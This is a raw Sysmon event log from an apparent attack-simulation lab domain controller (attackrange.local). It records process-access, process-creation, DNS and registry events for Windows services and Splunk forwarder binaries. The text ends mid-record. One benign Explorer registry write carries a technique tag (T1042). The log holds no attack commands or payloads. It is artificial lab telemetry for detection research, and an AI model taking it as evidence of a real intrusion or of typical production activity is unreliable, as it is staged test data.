14:03:18.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.074{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9526-6005-5505-00000000A301}6516C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.074{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-9526-6005-5505-00000000A301}6516C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.074{59A5CD1D-9526-6005-5505-00000000A301}6516C:\Windows\System32\InstallAgent.exe10.0.14393.4169 (rs1_release.210107-1130)InstallAgentMicrosoft® Windows® Operating SystemMicrosoft CorporationInstallAgent.exeC:\Windows\System32\InstallAgent.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=88C7DCDD735B31E4F5620E4B9F38C87F,SHA256=5EF1322B96F176C4EA4B8304CAF8B45E2E42C3188AA82ED1FD6196AFC04B7297,IMPHASH=EAB6EF3DE625719627DC808B5F0501FC{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000018591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.027{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.027{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.027{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.027{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.027{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:19.058{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:19.058{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000018611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.142{59A5CD1D-8E46-6005-1600-00000000A301}1544sls.update.microsoft.com0type: 5 sls.update.microsoft.com.akadns.net;type: 5 sls.emea.update.microsoft.com.akadns.net;::ffff:40.125.122.176;C:\Windows\System32\svchost.exe 22542200x800000000000000018612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:19.456{59A5CD1D-8E56-6005-2E00-00000000A301}2464176.122.125.40.in-addr.arpa.9003-C:\Windows\sysmon64.exe 13241300x800000000000000018613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:03:34.682{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda2-0xb5eeeca4) 13241300x800000000000000018614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1042SetValue2021-01-18 14:03:36.699{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids\exefileBinary Data 10341000x800000000000000018622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:44.526{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9540-6005-5605-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:44.526{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:44.526{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:44.526{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:44.526{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:44.526{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9540-6005-5605-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:44.526{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9540-6005-5605-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:44.526{59A5CD1D-9540-6005-5605-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:45.388{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9541-6005-5705-00000000A301}6860C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:45.387{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:45.386{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 